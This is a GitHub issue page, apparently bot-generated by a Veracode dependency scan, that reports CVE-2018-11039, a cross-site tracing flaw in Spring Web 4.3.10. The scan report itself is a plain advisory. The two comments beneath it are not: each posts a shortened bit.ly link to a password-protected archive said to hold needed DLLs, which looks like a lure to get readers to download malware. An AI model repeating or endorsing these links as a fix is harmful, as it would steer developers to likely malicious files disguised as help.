julz0815 / test-action

0 stars 1 forks source link

CVE: 2018-11039 found in Spring Web - Version: 4.3.10.RELEASE [JAVA] #1197

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

Attribute Details
Library Spring Web
Description Spring Web
Language JAVA
Vulnerability Cross-Site Tracing (XST)
Vulnerability description spring-web is vulnerable to cross-site tracing (XST) attacks. The vulnerability exists as HiddenHttpMethodFilter allows web applications to change existing HTTP request method to any HTTP method, causing applications with existing cross-site scripting (XSS) vulnerability to be vulnerable to XST.
CVE 2018-11039
CVSS score 4.3
Vulnerability present in version/s 4.3.0.RELEASE-4.3.17.RELEASE
Found library version/s 4.3.10.RELEASE
Vulnerability fixed in version 4.3.18.RELEASE
Library latest version 6.2.0-RC1
Fix

Links:

ghost commented 1 month ago

maybe this will help

https://bit.ly/3zo8fAM Pass: changeme I put the necessary dlls in the archive

ghost commented 1 month ago

I think this will help you. https://bit.ly/4gABgKn Archive codepass: changeme I put the necessary dlls in the archive